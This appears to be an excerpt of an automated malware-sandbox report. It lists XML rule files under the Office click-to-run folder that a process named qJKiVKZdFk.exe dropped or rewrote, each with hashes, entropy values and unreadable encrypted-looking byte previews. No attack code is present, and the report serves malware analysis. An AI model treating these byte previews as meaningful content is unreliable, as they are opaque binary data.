                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):808
                                                                                                                                      Entropy (8bit):7.795178521619666
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:iZ+QvzEQVBGKEbsTqmxuL9e3xeUYSf5nbD:iMQ7Eb3gxuL9zU/BbD
                                                                                                                                      MD5:C1E1AA9745D11CD08AC0D1965A63EB62
                                                                                                                                      SHA1:988DD631B831CF94CDA57F0A41F63B14AEE0D4A1
                                                                                                                                      SHA-256:BF4FA9FC08CDC4A15A5AEBFDF4B1B5E4A5C977F4CE3E4A852116C9959C7E2BAF
                                                                                                                                      SHA-512:93399A5190D6602A47808E692EA908268DF869C9EF822D167FFF2BEE8B2C1B72F8CB7C108AFA7C41DC9B96CF87A9CCFD19A769C06928278C81E39F7765C3AD14
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?...@....70.w7.c......p5.....!.0.,.7.ec1.P{.i......e.N.q..M.#..r...^......(va.LX.j....(..+.....=B..hG ].$.N..z.^J..c..&O...`a4....@..<.*.F3..r..{.7.).......0.I.>..q.......R....V...mi.r..K.....~/M..e....6..!.v......?.X<,..a.w.........\$@l..\s....d..X....'.9.*|...;Qr.4qlZ..@. .fR....b.&.....b+.H.4-...L.......b2..Q...........n....t.2(..q.Qb.'S...-...b......S......q..g.j.M>..\...............ukKxZ....rn2........[..X'.."......).r.nS..#j9>O.?.Z&?Mw~4c......../.q .P.:..r.!jz...0.....H$f1........./....n.o.Ki..c..(P!.S.9.........dl!:..@kD.....<.K.v.......{...s..a...../.h&.9_...W....'5*...AyR...\@....k.I..\P.m..X....YQ17.}-....p#w.O6......K.<. K..(...D9....U....."..7P...7"@..#,.o`:.1.|C...7.Ztp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120675v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):753
                                                                                                                                      Entropy (8bit):7.7145028676952485
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TF3AgaHyKfnWs7urAVHGXCWioJrft2yjxVKLB8w21IuukIcii9a:p36jVuUQXCW/ftVdVeMibD
                                                                                                                                      MD5:4546973B14BD9DAEE61EB797EE24975D
                                                                                                                                      SHA1:AEDE595CB53D635C04E0FBBBB1A89BF761862BE2
                                                                                                                                      SHA-256:7712BD644A6DF673D716F211E7BD7E39D3D660C65F0E8A9E94319A2A065D54A2
                                                                                                                                      SHA-512:D8437FBA76F39C7258DCEE3B893C3223AF6DDF70486EB3B1CA98323CA80C6458D809B816B0DFD970818E309FF7EC94C2F74A3E65D0FB7F34CAF606D351F15AB9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?._.7^......M...S..*....A..1/.o....+..o^.t..h...3.>qU...F-...l~.N.._........R....".c.XF..J.......m.D.../N...t%..#.[9....;M.".{..f......xev).?.....j7eHX.^.P....(.... B"...W..7..Y.".....wc..9.....].8o...r.?.N.i..j..wD..^.iKH?Y.....X..B! ...R.UDT.H..^........b..2D..^.j....z...~..k...1.$...%.Z=.7....|.W.K.Ht.%.c...-9z0.......F.7.!.H.9..pzyb...0x,..@_bo......v..yfa"q.c.g#3.......3.;wTxL...!.-....+wR_J&.&...A..W...;..S..9..g.+g.W.!.QE.sD<...L.......~..4..]._..q..k.5^K..)..b.#..!.<...@EvY.%....d.._....8K$..4.^rT{+7..v.....Du%~.L...no.R..G..`....r2.._:.2.N...1.*....J.k.....N$.=...'rr~w..a..MK{~...K..oQ%.NE......M........#....o....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120676v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):806
                                                                                                                                      Entropy (8bit):7.742671145821591
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DJIWMrU1BHNxFH0Q2abyprAR+3+KFHqDv0GQ7uhtKs5z6Zdy5/hzIBxMfM9FbPuV:VIWJ15Nxtl+p1FKwp0oMEdQE3jUbD
                                                                                                                                      MD5:9DE2155FB900A48A56FB7F639AC5F750
                                                                                                                                      SHA1:639CC884B9E194EE1B54D3904203F590C1E7FDE7
                                                                                                                                      SHA-256:A43FD8D2C1BCCB1A93C3AB249AD9414934EC92398C93143EE1F298FC6348CCAC
                                                                                                                                      SHA-512:D528B964B127BE8101D93752B6B53B862A3007544E6CEA7374F3FC460995850FF746100A1CBE58330A91E09D3AA85C9DDA09E2AFC3AC70B5451E8C6A8965F37A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?%q..].........B.g....V.......".Q....{s...!.F...?...}P..z.R.R....\.b...]...v?d..R.`....Wi.W{[D..Cd....[.$..#...3...B...|d6%@.1E.[L....H-.48@.K.......s....1$...(.$,,.}%.h.).W..........@....1...',.e...ET.J?..V..q6(..:.M.0.F..6..q..q..P.\......./lvy....{.....p.3.:.6....!.(f.&....y.*...u.W..........f..(m......@..G4"E3......Wu.H..V.RB@J.."..{/\E.....a..o......l......*..$.%....b/..8Kw...w3.P]h5._.....R....w.BR..._.....'..t..&.`ls.E...x>...C.....~....!..a\._KV.aB.n.*d...!..v.'.Qg.+L........K.l......."..kqJ5..E.f.N..)..04[..I....R....7.......u..T...1...Y.].{....9...m.....6.Vr...pm.s.p.$.e...)%c..6..?.+.v,({.....i].....?...=..U....!...YS..|.)..c ........|....&.{...87..4.Tnt*tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120677v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):739
                                                                                                                                      Entropy (8bit):7.716158515140198
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:tstIpGAlmfJQA9Vzc6Suv+h0Wyu/RBMhEYcjSgffWdHtoi02MW0ukIcii9a:tDG//5Wy0RGhEusfkHtdPMWPbD
                                                                                                                                      MD5:B64AF8F071235B9E112436477890D56F
                                                                                                                                      SHA1:4206EDCDFA9769CE4C30657EE07B28B8C81907BD
                                                                                                                                      SHA-256:3DB77C384BEC9154CEA055A810DCFBB84FB881976714C40AD470BA066EE0FA86
                                                                                                                                      SHA-512:1A77B19027AF1430691957B34C5C8D8507AB83EB802BF41B0C0033B0750BFADA9B285A0CB1391E76FDE28020F37B12E78322DB5030A05985573C710E7D20A916
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?....s..\M!``..........2......'Bu..b89yw.aS-..}+".....Qk!....M.. ....gs....V.,.6...Z./z..o1.E..N...q.r.......x...#.d.....T/%...1$FI ."..X...!.n4....r.%....FJ.y...6W....F:..p.7..cO/..6....+.Ome...M.!..c...A.........%U....3....Ox.]#..o.ql..n ..|..`d.u....v...6}.)....Mp>..Y...Ekw....R.Z.E..B9.....D.a.............f.2o...a.V*.c.h.q..B.{...}........:...)5.V...Bs..yY.l\..fh/.['[.'.......~'..;......:X.9......>.Np.4.sCN`...ujKR.V....KV..B....DYyH...1.2.......(...[.].#.W...'3..=....B..'....a.......F-.Q...._..l./.../q...c...B..~.@.W...V.v...*$|..8.]lk.rh.T...[3.gPa..T.V...L.....Whj4R../o,.......S.....=......H.`#.Z.y.L.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120678v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):802
                                                                                                                                      Entropy (8bit):7.740614169537602
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:XSFcadMUz6E146e+vr70P+VbzCzlZfUpu0dNbD:XSFcavx14c/0P+Vbuz+u0dtD
                                                                                                                                      MD5:4E5C33B48D2220FAE5215AFA31E858E3
                                                                                                                                      SHA1:52C469135BB3193DE5F6C29850FE0D2ADAAAE17D
                                                                                                                                      SHA-256:BB2DDA0D7AFF1636C1A9F055557C8375B8112F083ED66A6AC3F79A0C0A8EB7F7
                                                                                                                                      SHA-512:5FEA9CD6A3B4584C32F9F56BFF134B80C428F7AEE68B1259B2960772154CA9FF8B2C868541D53A60C3FE3A9F089C886D89527BB6A97D0D737FB24E46D8922EB3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..l....^..m ..R....d...m.L..\'y..|!..k!....M$....>.l.<2..O....`Fc@M.|.,C..ukJ.' ....0F6\...$...<.Q....K.}.....Zo..Gf.8.]da..&....;...Q..(..g..t.../......b*&..Z..-K~_...W..k.I..z.cA...n.O..`..`.6..W..w.I...#|...c..g@........)v...mBZ4y.................m..I.V...Im.3..{......o...#.B.y..OW.A+...`..........cO..,=.j.^.D.......Z.e.Q.b..&......0.oZ..q>...R...~..........A'...uZ...N.....z.I.......2Z..&.?.....o1.%.-.....)..H.....m*.......P......m.<.A.x.2.........n...<E.S..,..q.$..gy...u.mBF.U..l.2yg.....G.)!! ..N)V]..I.43 ./...r..H....7.[.D.I.......&....}."...)..~...&.o..aUXJ.w.D.m..2.J.l...[zOv..x.....s..m-...%..}...FTC&.A...B..qh.g.......Q...#.k.....U.v5..A......}.....J.....exjR...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120679v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):508
                                                                                                                                      Entropy (8bit):7.535135776357577
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:n49sIDAPU5PlJCeqeIoupJDzt4b8QLnukIcii9a:4MSPl/5UJvt4A9bD
                                                                                                                                      MD5:BC13232C882BC2E1956DB52C379A5896
                                                                                                                                      SHA1:81749E5123EC4ECEBD8B3C45FE32A2AFBF698B0A
                                                                                                                                      SHA-256:68E1674406934895522C4A462CFB7CAD939B0F0AC293999932F23E78C93A6871
                                                                                                                                      SHA-512:36A1101A32853FBAB84FB61969F67D955E5E2068EEDDD65BF7B3488DE366C9E52A7ECBE3E4D8FA92AA65C4800795E7DF3B6AD70FD3D2A1A93E19E519FF457A1A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.l!Tso.d.'F.........q.8.....5C{.o.n.[.*..1F...`I.9$..F:..B36Q.^.L.:{..>...|p.Jg..j.....z>x.....0~..To...yW....#.>..2.#.u.........w.Z.*oq...<...*%..B.W}....V.o?..n...$.`....r.R....-F.DR.o.L,.|..R......=s.p0@r...kh#i.b.._.)u......../..8.T..J. Uh.x.....n....`.1.q..[:..?-....>qJ..X[.......#.7...}1.....!...Ar..0Y.O.....!.L..!B......y<A.3z..s6%....re.[....x.{.K....#H...).X..m0"'|.Y.".#......,qW.H^f.v....a.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120680v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2286
                                                                                                                                      Entropy (8bit):7.901038920601359
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1YruJEXZvWe54TjARWzOqbvSUS0EpIfrPz12SkdEgyhLoWPyBXASyqFD:1rEIe54wR9qbaUOSPsJdEJPPiXAS1
                                                                                                                                      MD5:C57A5942193CE48224E72F4E0DF04895
                                                                                                                                      SHA1:07BBDBA95C1DCF9252F7C334770FEACD48DACEB6
                                                                                                                                      SHA-256:3DD6E65A3145C279541613AAC46D3F1C8954A86AF4471A83205892344ACCA309
                                                                                                                                      SHA-512:BC1E8D7E5367BEFFED7C4F33279ECAB74285177863945D8BE86B8BECC2EC3D837CD53D9D7D1EB2FF8759B5D2D87138919632AB16FD9C85F2394993FF5CB6F1F0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?...J{.[..X+.....A.z..:..B...]j>.z....G.D.H....g..o0.6....h*I.>.Q._..++!...~.|\R...p..3_a...v.......XgaT..j:..2"GU*...(n1..?RS........'...AE<Z..k..e..a.`0rj.<.v`....T:.u.f.....=.....a.2{....K.ct.D..h.%.....D....ww..?{7../...D....I......R..@.Y.e. ....(0.[..t,\A.RT..=..-..i.3rY.wY....%..mP.....:.....+.....=.cP.*.x B.....({/.....yP-R.i....4]]..*Z..."........gYDg<.O...R..4.k.pV.tS.R`5)....+....FD.S+....d...P..RD.......O.....1K..3.\....#.B.D.....rh..\....U...z....m...]..@...i...N!FH.."..y...llb....ko....R...8\....%>..2.N;....}3.J.P...."n.t.z.....v.m......V!....<o.d..;..q......7......Um..Oz...B$.?.w....U..w#...B..]p.U. .....Q.lb..-....c....{J..>.L..VH.}...N{.4C.X.cZ.v~V~..L.. .P..\#...."...@Aq)3..I'.x..;..|.....o.Z..=}..tj... .'s.-..*.A..I..f.).*..[........=...GF.C.z..u..7.<.jJ.0.^.........K...gA.......4.2......A...a//..I..^.....&...p../.a...G..........4K.Qz}tup...M.r.%..yKe.3h?<.. S..`V!.R..{.'.-FC.Z.c....g..F.a..q.yR(....i5..0Pa4..$z.D.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120681v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1292
                                                                                                                                      Entropy (8bit):7.83561745352678
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:YjpPr9dKXY+pjObCQDMDiUmXG1FztP5B5nK0VWdEWNVmW0bD:YVPTK0NMuU8EtP5B5nZVMVsD
                                                                                                                                      MD5:5DAA8439EC9666446CA8E5CE4E5BCD74
                                                                                                                                      SHA1:EC351C7FF94EF61680BA56346B8C3A18C81763FA
                                                                                                                                      SHA-256:03BD89BA410877E4BA55FAC64E000386AF654D496FE7070AE4F4440F75126562
                                                                                                                                      SHA-512:47F86F45DC3A05DEF3FF127640B5512D8994E2C133317D8235C8EBD023BC2DB41E50FBB5DF697E2BFB85383DD3442C3D284951303CAD777752146545C6D99D82
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.v........g....3..ui.v..........Bn.v...e(....E......=ee: 9....mO/..m.B*...#..N?.6.2..w...p..;4....b.q..d..#b.u...R><.S......kZ.(,..qGX..%_.......nX.._F..X..e.....0;......#.EaK...........ti.|.s...u.X.....7.5..n.......+.m%.8..l..d,~z`.............Y5..)...<&SK<.M........q:...3j.(D..NE.}..a1~l.*.K.....wW!...y.m..i...,......a..g.Zv..kG0..'5.....1.....8tt.}..LD....s.!...RIi6..].4p.F.o....bO..).;...o.+c...Vrfp.....M.*...H4.....2/@..a.#.t...$M(...qt#/...V.:y.svj.`>d"d..../t..B.6.....+77Jz.;.lx..4iUsy. .$..VZ....El....$6.&.d....odIz~..|..."...N.-.T:.....l...k..+.m.,...t....xs>..-6...A..o.)..i.c..BI..gM.*L.....3.n.D.O.|.z....i]a.r{.B...@].f...S...X..M..O.4.h5.{.e_....y.*f.....I.3..x...*....n...;+0jZ...}......5...[M.XM..u....t....6...._..B...6V]X..-6.Nu....{^|...S^...~.../..$#h6G...`..<..h...!.[..0j8.u.]x[...{.Z..2.qLxz..8......H.R.......N.....|.a....-....*-gv"K).N...!Y.W....)....ZpFn.@5..t.W..)D't4-......i1..Sj.I.....U../.....O.$v2..g.e>...Z.R.... .Q

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120682v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):835
                                                                                                                                      Entropy (8bit):7.753754673539746
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Jd7EcCN5o9XfZEYecfOxKuz3KkMcUi+ncebD:JVC/o1fZregOgyKkxUiYXD
                                                                                                                                      MD5:8379AAFD8619DD0E6CCE7DF56AB055AF
                                                                                                                                      SHA1:9DBA28D2035E93F155DB74028751EAFFCB9B6B63
                                                                                                                                      SHA-256:3910E2B8A5258D99DB6AA5ED11DDCF53D7356DA96197A38984094B65066647BF
                                                                                                                                      SHA-512:6D85AD36F07531E21AB8F1C2AB5D31ED3C7DD061C49763A37ECD6402F8005EA61B152B769113F90B98BCCC5F0CE98B6F0E46533028A47D0693E78C9DB2FC6E53
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?k.VO.i.`.l..&......f.2......3O.?WYjQe.....XTz..........7..BD.hD.....UG...1..iL.Y0-.,.Q. .:Ts.".p7<.%..<^.@2.p../9...L..Q.:.XE.".......`.... .K....Y...........E.9..m.@*.f..........&...!...[S.....RV0.LI....|.f.2.P..Q.+]..i..v........UrM.S.OL;......Yq2A..o.A.U........V..=....2y...2R......^>s..o..........0...@/.\T..go....c...Yq.3.`T...T.....'.H...}.>j.q0t.R.#...~..tc'X.i.z.....C.b.X.....d.._[..Nqhfq..1,.F......6.....@1...l..r...0y.....Y..n{...!.X...,l..s[...F.........m*...O...f.R.......u.....f....i...$.U....%0(.}...{.Z...e...w..N.}.e$..........q/o6.t..rF.....h...)...(.*..a..jx......hSoH.k......M....Y..4......x.Z.........F.o..p\r...k..G......C.dY..".UX...S.g.....`.N.FGE.. ...2kS..?.}|j5E..UL.......f./\5_..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222015v6.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1692
                                                                                                                                      Entropy (8bit):7.8806317272484145
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:48K2IEVEVjiUdQWDE5aphiHlA+h8YuiIuGgnfhD:48KupUdQT5ap8hIiIuGgnR
                                                                                                                                      MD5:C42A39B36856F50431E906B595D2F977
                                                                                                                                      SHA1:9A2AE0F023325A96F75116D76F21DF319AE1D170
                                                                                                                                      SHA-256:ACDA4977524150DF10D9477CEB26D71DC96C154D451462D7DC7372A9FC8598DF
                                                                                                                                      SHA-512:1F451849AE695074EFC5A54CCF6E4E13BE7A8DC102D8AADFA6212F43B7AA3E333ADE3FD1E576F1190D17BBF0087F4268D177F671082561C5C1CB7653E9F13E7A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.^e....d.Q!.N...A....r.s.a.l.Dcq...^s...\f.l....Yny.H.....vh..p....S..Pz.&.......E..<.....M..E.....P...-.Iht.M"d...N6......]..Hl.F..T.j@7..W..X.2V.....W.~..W.n.U.9.0.o...\.k.6pC.!A../7.q[<...UL.6..6....}y.l.N.X..r.......W.....`.I...(,..'j.B.Cf.Qip.R~...p.4..x.9..:.]g.1~~...b....1fJ;.....](.....L.\h.S%f.oJ'*...k.rE..WW.B..\....|Ukg...u....'...j..b)..F..H.[btU2.b.2.l.C6.`o.G\..C{..1{...$.@..q...P..Sr...A..=..a.....7...;7;..=..).4.-eL...i...v.W..".....@....q.4..~..Q...OY..".bf.....e...zk8R.l..W.;lMWT..e.Y..".m;....2...'.zX`.......x:... ..=...6..>...........z...;.I6h...N(.;....p..-.Q@.....*>...I.x..../.x..|..+.e.y...<D__...@C29?b..0b.!...{.,'&.......B.F""..,.........j.D....g.zp.........'.3..`.2...t...p.e.]..x...\.'.<..r..GG..$.U.XF..x}..4.5#....-;Jc.UH..7.5....R^...v?..x.(......_..[.....D..s../l...O..<.B.8( ..m..pO....!"..o..b....'....b.....0.a:`..g.....)13f.Erp.r....T...w`M.f......t>]z...Z.df.7..h.\...z..7..J.........H.8Y8..3.{~)......

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222042v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):882
                                                                                                                                      Entropy (8bit):7.752377820666651
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:KouedBC1uSvYOWOzZ6tIG8YEgTirqNMUynPYVbD:JDd5kZo2YJWrqzyn4D
                                                                                                                                      MD5:651886B431C81E92F2BE3CC60C60EF8E
                                                                                                                                      SHA1:875559AAB71CC0A97B3ABADA76733B6EE7DB1A95
                                                                                                                                      SHA-256:ED0A186B1832C5D4A0068EA6DD1F7A09BAE20F51FB295397DC4AAC44235C91E3
                                                                                                                                      SHA-512:F1952E3DCC66556B6A0D647F089E91D9D18AA6298B6CCF85DB722A1F52D703AADB430FCF59D846D7FD936C2445707D20174BA13C5ABB42D69164ACBFF0FCD4CA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.G.C......'K......q.....~...r...k....N.tl:.....-..t..m^O#U.[C.W$}........R.....$"..@i..x....l.7."..[)g.v.:.!..k.8..T.q&*.df.E......_..!.z..$.P..Dq..n...q.....,?...~.....A.I/ ..\.Xu..-_......d"...=B..Hw.+.!g.U...F.....L,{^..*8=....Dh......}k..h.}.Di...D_...hXi.].IU3..cD.T..[4"....Iq.....0|Z.>^.)N....!kr.[D;.....,_.#| ......B.4.*..Z...P.K....u....C.....|k.;.S....;.Gi).O...39=.k.d@o.]g...:..=>j+..5.~.U......R?..Y*....;...J.t.....A~..?..@..1..p......SNX.v.ah15..5.-..C.H...M..'.D..jU)......|o.`.te.P...4..\..".#...Z..&.@v..j...~;%B.<.z6..|v..A.E......p2.r.L.....q.O8Xr7.....C..>l.w.&4..=.y.9..^..u....2"j....rO..&.ir.....e..(qM/...&.*...|..>...2"k.....k..s.h....2./.?.K.p.9.xE.[.av.....,t..T#c..6..L.Y.._....8...-.......pG..7}_*..D!..K.......D{.O%.rV...0.=j..T...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222043v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):953
                                                                                                                                      Entropy (8bit):7.78806743779581
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:wvu2kZ5wvJCJ9XJav4bYU/nU3kZ2EeGQpV3j1EPXmbD:w22kZ0uXkvsYU/uk2EeGMVZE/0D
                                                                                                                                      MD5:93ED7A25FFCEFBFD271D9EC6BDB1F5F2
                                                                                                                                      SHA1:2589E479DC8D3C20274AF7245D3A4E612A9963B7
                                                                                                                                      SHA-256:2890E0F37F030A69111EBAD284E807A7452079187B68F91E50612B7558CBD113
                                                                                                                                      SHA-512:15AA08EBB18C66CB9AD5BCB252DC97CBAD88C459CE9C10CB09751432501AB58569EAB957139805A8F9FE07B616BB2E3C6FD227F0C0C8050AD0C438F442157DDC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlW...6.6.h.C..b......j.t.c..kb...h....N..X..D.E..)2..f.....JU.q........],-$.e_Z...u6.f...Nv...hj.YO.>.....w..(.pR.ekF@_.]..+.tc..=h..n...._..D..+...,(.......1. *......2o.&.T....fmt.j.TGF..6..!..X......ee........Y.."....m. .Vx.......L*e.'.z.jC.D_B..g.86(-5}#<!.eM..dpdg^.)...Na..B..ud.{..=.a.#.pG..[..b...c(.LTC...>.Lu&.........m....&....Q...O....T.........<...,o.[.:v.<~Z$X.1.3.t.X......`+.....4[..zo3.$s.5zy.{.dF.588C.`.......!(.{...9W.r/AP....1..JR.@..4.N..}4.iv..vA..C.D......(H}..#..5...>i>%.."H#.m.Z.}MX..(a..J..2.D.<.9....A.4f)`.5.r.`/6.0.qp.#.s......k.g.N^Y..F........+. ..h.....IM...!....r>.$T....d.s.,..\9.C[.)|B:_.`V....&.'.....&o......{^lZ.s.......,=.@.H...%........].rU..v<.p.S)....2.......J..n...%./...&.<..Q..1.:...$.2.a.....I.J[.dX+...O+.$.#fG.5...R.I....c..)..o..T.....Z.".);...u.y.....@#..f.N!.i..p...$.......v..U.,tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222049v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1139
                                                                                                                                      Entropy (8bit):7.8439261369432725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:W1QFvD3eIK5CqyCcNQ7yq5uqgcn9ceMRleHS/D/riJn+JbD:WaFr3pq5cNQ2q5uBcWerHnnSD
                                                                                                                                      MD5:AC8BDDFD4E02065391CC1BA13CE1F72D
                                                                                                                                      SHA1:82E20F2F102CE3CE35F7C2C362731D9EA31304A6
                                                                                                                                      SHA-256:9CA97C35B5A198789373B24B1376D6C0642716E6AB9059FC8C1B1A354CECFC39
                                                                                                                                      SHA-512:6264DECD66FD93AEFF43C0389524F82023FF8F7F8F35E94F1F03F0E480DF73B73DEB683473F23180A9F0882084302460FDA4DA9436660F49C647703AE189D466
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml+Qc..y.i.......{..h(D.w.t?q.C.....j...M.c....](.Z..~.{_.@..@r..K.~.vQ=.t4.u.5M.T..W..gd.7.c........3v-U.dh.q.y......7.oX....L...Xz..W*....$..1.!..?O.gV..3. . .lt...?@..yo...z......g.5..:Ws.'.0.6b.3M...i.o.Qh.M......=$z.z.4A.k....k..Ku.....b.........Y...........f...T..@....a.:34z..T@q....#..p.q^....X.b...C.RZ...F..........IJ[..dG.c.T-..r.h..pzFv.X..s.R......Q..^?5W..,`36:..}USs.....5.......%.v9.'...p..&...Oi.0{(..?.>..o.N.~..K ...R........Klg...}.....M.v.^..J.l.p...*.V1..aG.{..`9.m..W..]^>S...h..(..ip...........U0d.._....h0h.G.*,.M....(..c..2!.zJ8t.4I.....;.p$..O..AV.~..p......N.1.[.j. .....N..r..v..S.QH...8Br..\.UD.}.....2....E...:.S.$._.uD....3X.b......J.M..{h~:.L.r.wW@..%Ij...F...V|....X..B....F^.97Z...3.....g.+....ba..4...D...q.*f.zm.._.wc...2...G..8.t.O..;`L.....v.i.4....en w...u[....GI.`.......Y..........Y1M.A'..HPT....C..#.|k....A...^H .N..S.f.e...d......EK...Sk.[{...........|.......n/.'.O....y.Q.7.F|.,#9..*.......c..!..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule222100v7.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1678
                                                                                                                                      Entropy (8bit):7.8725297503705765
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Pn/lIYTJIZPiV5R+z6O3kNTYqwCZpM8PBRcCE09RCED:POMqAa1kNT+CE8PBRljF
                                                                                                                                      MD5:079FD9EBD223F1A887EF0423844C30EF
                                                                                                                                      SHA1:FB257EC2F26CAF38F1315647316929B37AE05682
                                                                                                                                      SHA-256:EAB50548BF663505DD3E9D59DC5FCF450718A5EFB5FF16262DF05E8D5C5058B3
                                                                                                                                      SHA-512:D7604E57A362C9DFD4213D0B8A09AF3DE9668F476F4A909B4BAC9918EB2C43A4E3C0C588780FF938096242F40CC22E6AC5CC5BD857C368AABFBC1EE7B3916F1B
                                                                                                                                      Malicious:false
